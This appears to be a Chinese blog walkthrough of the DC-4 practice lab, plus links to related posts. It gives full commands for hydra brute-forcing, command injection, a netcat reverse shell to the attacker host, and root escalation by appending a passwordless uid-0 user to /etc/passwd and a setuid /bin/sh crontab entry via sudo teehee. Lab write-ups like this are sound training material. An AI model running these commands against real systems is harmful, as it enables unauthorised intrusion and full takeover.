【DC系列】DC-4靶机渗透练习

最新推荐文章于 2024-04-17 22:47:22 发布
最新推荐文章于 2024-04-17 22:47:22 发布
阅读量300 收藏
点赞数
分类专栏: DC系列靶场 渗透测试 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/serendipity1130/article/details/120003639
版权

1.主机发现:sudo arp-scan -l,发现靶机ip为192.168.225.143

2.扫描端口,开启了80端口

nmap 192.168.225.143 -sV -sC -Pn -n -v -T5 -p-

3.提示使用admin账户登录,所以仅需要爆破密码:

4.用kali自带的rockyou字典进行hydra爆破,第一次使用需要解压:

gzip -d rockyou.txt.gz

5.hydra命令爆破:(不会写命令可以将字典复制出来,在burp中爆破)

命令详解:https://www.k2zone.cn/?p=1535

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.225.143 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

6.点击run,使用Burp抓包,发现radio=处可以修改执行的命令,可以执行任意命令

7.给kali反弹一个shell:

nc -e /bin/bash 192.168.225.133 1234

8.进入交互模式,便于操作

python -c 'import pty;pty.spawn("/bin/sh")'

9.查看用户:

cat /etc/passwd

10.发现有charles,jim和sam三个用户有/bin/bash,进入他们所在的/home/jim/backups/目录下,看到有一个字典bak文件:

11.jim目录下的backups.bak,copy到本地,新开一个命令端口用hydra爆破ssh的密码:jibril04

hydra -l jim -P pass.txt  -t 6 ssh://192.168.225.143

12.爆破出密码进行远程ssh登录:

ssh jim@192.168.225.143

13.查看mbox的内容,发现是root用户发来的邮件:

14.进入邮件目录/var/mail查看邮件内容,charles说老板让我把密码告诉你:^xHhA&hvim0y

15.切换到charles账号登录:

16.sudo -l查看权限,发现可以不需要密码执行teehee(root权限),teehee可以来向其他文件写入内容

17.利用teehee提权

方法一:添加一个test用户,并使用teehee执行直接写入passwd中(设置uid和gid都为0,那么这个用户就相当于root)

#如:admin:x:0:0::/home/admin:/bin/bash

#[用户名][密码][UID][GID][身份描述][主目录][登录shell]

输入命令后,使用su admin即可免密登录,在root目录下查看flag:

echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

方法二:通过定时任务执行脚本提权,向/etc/crontab文件中写入新的定时任务,通过teehee的sudo提升权限以root身份写入crontab计划任务通过执行获取root权限

echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

时间部分全部填写为*,默认这个定时任务每分钟执行一次。

通过执行的脚本将/bin/sh的权限修改为4777,这样就可以在非root用户下执行它,并且执行期间拥有root权限。

malloc_冲!
关注
专栏目录
DC-4靶机练习
千寻的博客
01-02 3101
DC-4靶机练习 第一步 扫描主机 [nmap -sP 192.168.139.0/24] 第二步 扫描端口 [nmap -A 192.168.139.147 -p 1-65535] 第三步 访问80网页 第四步 尝试使用burp获取账号和密码 Kali的浏览器中安装插件 proxy switch 打开burpon 打开抓包 [cat /usr/share/john/password.l...
DC-4靶机进行渗透测试
zll___的博客
03-14 528
DC-4靶机进行渗透测试
DC-4靶机渗透测试
weixin_52003758的博客
03-21 388
DC-4靶机渗透测试
DC4靶机渗透测试
Huangshanyoumu的博客
04-16 694
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞挖掘1.访问目标 ip,查看内容2.使用 BP 进行爆破密码3.使用密码登陆4.使用 BP 查看执行命令流量包5.替换命令来使用 nc 建立连接7.使用 nc 将靶机文件传输到攻击机8.使用 hydra 爆破 ssh 密码9.ssh 登陆,进行信息收集10.提权 描述:从靶机DC-3开始,只有一个入口和一个最终的flag, 只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境版本: VMware pro 16 Kali 202
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新... 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
【靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1233
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
DC-1靶机渗透笔记
qq_60600840的博客
08-08 243
DC-1靶机、安全、渗透靶机
DC-4-Web渗透测试靶机
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
DC-4靶机实战 渗透测试
她叫常玉莹
07-23 432
使用arp-scan查看主机 arp-scan -l 靶机ip地址为192.168.0.151,使用nmap进行扫描 目标机开放了80端口与22端口,使用浏览器访问下80端口 页面是一个表单,抓下包看一下 使用jhon的字典进行爆破 密码为happy登陆一下。 点击command可以运行命令,bp抓下数据包分析下 命令是由radio参数传入的,并且使用“+”代替“ ”(空格)。发送到repeater模块修改radio参数测试一下。 可以看到命令成功执行了,说明这里存在命令注入漏洞。在/home
DC系列靶机渗透DC-4
weixin_52515588的博客
06-10 434
打开靶机,扫描IP地址,确定IP地址以后,利用nmap扫描开放的服务。 如上图可知打开了80,22端口,那么我们访问一下。 利用80端口发现了网站登录页面。接下来,我们需要用到用户名和密码。在kali中有一款爆破密码的工具john中有一套密码字典,那么我们就利用这个密码字典进行爆破。 把文件复制到一个路径下面。接下来就需要用到burp爆破。我的burp是安装在主机,那么就需要设置一下。 在IP栏选择一个地址,记住不要选127.0.0.1因为那个是本机的地址,随便选择一个自己喜欢的,填写一个没有被占用的端口
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1791
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
DC-4靶机渗透
weixin_45349299的博客
12-21 1080
开放的端口:22 => ssh服务 ---- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80 => http服务 ---- nginx 1.15.10扫描出来的网站目录。
渗透项目】靶机DC-4渗透过程
命运的旋律的博客
04-12 387
信息收集 主机发现 nmap -sn 192.168.72.0/24 端口扫描 nmap -sV -T4 -O -sT -Pn -p- 192.168.72.156 --script vuln 访问80端口,是一个登陆界面,页面如下 目录扫描 dirbuster 没有发现其他有价值的目录 漏洞利用 通过对登陆页面的测试,发现该页面缺少防暴力破解的验证机制 通过页面上的提示,尝试...
DC-4靶机渗透指南(渗透测试详细操作)
jrdh的博客
12-06 5078
DC-4 靶机渗透测试,帮助读者了解DC系列的具体考察内容
DC4靶机渗透测试(个人学习记录)
m0_53806046的博客
03-20 887
在执行这个命令时,如果你的桌面目录是 `/Users/your_username/Desktop`(这是 macOS 的典型路径),文件 `passwords.txt` 将会被创建或覆盖(如果已存在)在这个位置。在这里,它输出的文本是 `"***** root chmod 4777 /bin/sh"`,这看起来像是一个注释,但由于它后面跟着一个管道(`|`)操作符,实际上它是要传递给后面的程序的输入。3. **`sudo` 命令**:`sudo` 允许普通用户以超级用户(通常是 root)的权限执行命令。
【vulnhub】DC系列DC-4渗透测试
Hi~ 土拨鼠
12-28 466
文章目录一、实验环境二、实验要求三、渗透过程 一、实验环境 目标靶机DC-4,NAT模式 攻击机:kali,NAT模式,IP:192.168.35.131 二、实验要求 拿到唯一一个flag就ok! 三、渗透过程 信息收集: 使用nmap扫描存活主机: nmap -sP 192.168.35.0/24 -oN nmap.sP 得到靶机IP:192.168.35.151 端口扫描及版本探测: nmap -sV 192.168.35.151 -O -p 1-65535 -oN nmap.sV 发现开放了
VulnHub系列 DC-4靶机 渗透详细过程 | 红队打靶
最新发布
rumil的博客
04-17 1500
通过test.sh脚本的提示信息,再加上查看发现的backups目录当中有密码信息,通过我们得到的三个用户名信息,再加上这个密码信息,可以尝试ssh爆破登录,观察是否可成功爆破出ssh用户的登录密码。回到后台,等登录即可,进入后台,发现有命令工具,进入查看,点击run,发现执行了ls -l命令得回显内容,抓包看一下。然后我们再次通过charles用户进行远程登录,成功登录,发现也有邮件,查看一下,并无有用的信息。去往此目录,查看jim文件得内容信息,发现charles发来的邮件,并有连接密码。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值